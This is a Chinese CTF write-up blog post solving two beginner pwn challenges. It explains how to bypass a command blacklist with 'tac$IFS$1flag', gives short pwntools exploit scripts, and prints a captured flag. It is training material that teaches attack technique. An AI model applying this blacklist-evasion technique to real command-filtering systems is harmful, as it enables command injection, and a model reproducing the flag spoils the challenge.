NSSCTFpwn刷题

[SWPUCTF 2021 新生赛]nc签到

打开附件里面内容

复制代码
import os

art = '''

   ((  "####@@!!$$    ))
       `#####@@!$$`  ))
    ((  '####@!!$:
   ((  ,####@!!$:   ))
       .###@!!$:
       `##@@!$:
        `#@!!$
  !@#    `#@!$:       @#$
   #$     `#@!$:       !@!
            '@!$:
        '`\   "!$: /`'
           '\  '!: /'
             "\ : /"
  -."-/\\\-."//.-"/:`\."-.JrS"."-=_\\
" -."-.\\"-."//.-".`-."_\\-.".-\".-//'''
print(art)
print("My_shell_ProVersion")

blacklist = ['cat','ls',' ','cd','echo','<','${IFS}']

while True:
    command = input()
    for i in blacklist:
        if i in command:
            exit(0)
    os.system(command)

blacklist是黑名单的意思

也就是说里面的内容都被禁了,所以我们需要绕过

cat可以用tac来代替

空格' ' 可以用 IFS1 代替,也就是tacIFS1flag

编写exp

复制代码
from pwn import*
p = remote('node4.anna.nssctf.cn',28808)
data = p.recv() 
p.sendline('tac$IFS$1flag')
p.interactive()

[NISACTF 2022]ReorPwn?

查看一下附件

复制代码
checksec 1

64位的,ok

找到main函数,F5

复制代码
int __fastcall main(int argc, const char **argv, const char **envp)
{
  setvbuf(stdin, 0LL, 2, 0LL);
  setvbuf(stdout, 0LL, 2, 0LL);
  setvbuf(stderr, 0LL, 2, 0LL);
  puts("evcexe ot tnaw uoy tahw em lleT:");
  gets(a);
  fun(a);
  system(a);
  return 0;
}

evcexe ot tnaw uoy tahw em lleT

Tell me what you want to execve

告诉我你想要执行什么

双击fun

双击system

分析一下程序,用户的输入被存到了变量a中,a经过fun函数后,传入system函数执行,也就是说,command就是a,也就是用户的输入。

直接galf tac得到flag

编写exp

复制代码
from pwn import*
p = remote("node4.anna.nssctf.cn",28447)
p.sendline('galf tac')
p.interactive()

NSSCTF{ee0c2423-7c37-4e3a-a969-430fbaf645d2}

相关推荐
ONE_PUNCH_Ge5 分钟前
Go 语言变量
开发语言
幼稚园的山代王6 分钟前
go语言了解
开发语言·后端·golang
晚风残13 分钟前
【C++ Primer】第六章:函数
开发语言·c++·算法·c++ primer
满天星830357728 分钟前
【C++】AVL树的模拟实现
开发语言·c++·算法·stl
zskj_qcxjqr34 分钟前
七彩喜艾灸机器人:当千年中医智慧遇上现代科技
大数据·人工智能·科技·机器人
怪兽201444 分钟前
SQL优化手段有哪些
java·数据库·面试
weixin_456904271 小时前
基于.NET Framework 4.0的串口通信
开发语言·c#·.net
ss2731 小时前
手写MyBatis第107弹:@MapperScan原理与SqlSessionTemplate线程安全机制
java·开发语言·后端·mybatis
程序猿费益洲1 小时前
Docker 网络详解:(三)四大网络模式
网络·docker·容器
Deschen2 小时前
设计模式-原型模式
java·设计模式·原型模式